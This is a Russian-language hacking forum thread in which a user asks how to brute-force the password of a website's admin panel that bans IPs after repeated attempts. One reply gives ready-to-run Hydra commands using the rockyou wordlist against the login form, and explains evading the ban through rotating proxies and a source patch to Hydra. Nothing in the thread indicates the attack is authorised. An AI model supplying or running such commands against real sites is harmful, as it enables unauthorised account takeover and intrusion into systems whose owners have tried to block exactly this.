Как провести брут атаку на админку

Discussion in 'Песочница' started by Sensoft, 24 Aug 2016.

  1. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Как провести брут атаку на админку есть сайт с админкой site.ru/admin
    Логин там сразу показывают нужен только пароль, но загвоздка сайт быстро банит ip на час
    Кто знает как поставить запрос в гидре ?
     
  2. Absurd

    Absurd Member

    Joined:
    15 Aug 2016
    Messages:
    20
    Likes Received:
    10
    Reputations:
    0
    Вот к примеру описание https://blog.kplus.pro/hack/hydra-bruteforce-passwd.html
    В гугле забанили? :)
     
  3. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Ещё вопрос логин там прописан и стереть его нельзя его надо выстовлять при настройках гидры ?
     
  4. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Короче ссылка выглядит так http://site.com/admin
    В форме прописанный пароль домен сайта его стереть нельзя
    Примерно после 100 запросов банится сайт нужно хотя бы 500 прокси
    Пароли для брута есть путь знаю
    Кто может в лс правильный запрос написать ? буду вечно благодарен
     
  5. korneev

    korneev New Member

    Joined:
    24 Aug 2016
    Messages:
    13
    Likes Received:
    3
    Reputations:
    2
    hydra -F -l admin -P rockyou.txt site.com https-form-post "/admin/index.php:username=^USER^&password=^PASS^&parameter1=value1:S=Login Success"
    или так
    hydra -F -l admin -P rockyou.txt site.com https-form-post "/admin/index.php:username=^USER^&password=^PASS^&parameter1=value1:F=Login Fail"

    чтобы заставить гидру использовать списки прокси придется использовать какой нибудь промежуточный прокси-сервер, куда ты сможешь эти списка загрузить, а гидру заставитть использовать этот промежуточный прокси.

    В качестве такого может быть mitmproxy (kali) A4proxy (win).

    Еще вариант - используй сервис смены ip у которого одна входная точка. например proxymesh - он тебе дает одну входную точку для гидры (например open.proxynmesh.com) и чередует выходные ip. Но он платный.

    Чтобы заставить гидру идти через прокси - надо сделать так:
    #export HYDRA_PROXY=http://127.0.0.1:8080

    Еще момент. перед отправкой POST гидра всегда отправляет GET. Это может уменьшить количество переборов до блокировки. Учти это. Чтобы это исправить - нужно заменить getcookie = 1; -> getcookie = 0; в файле hydra-http-form.c и пересобрать зверя.
     
    Sensoft likes this.
Loading...
Similar Threads - провести брут атаку
  1. raarkil
    Replies:
    4
    Views:
    6,179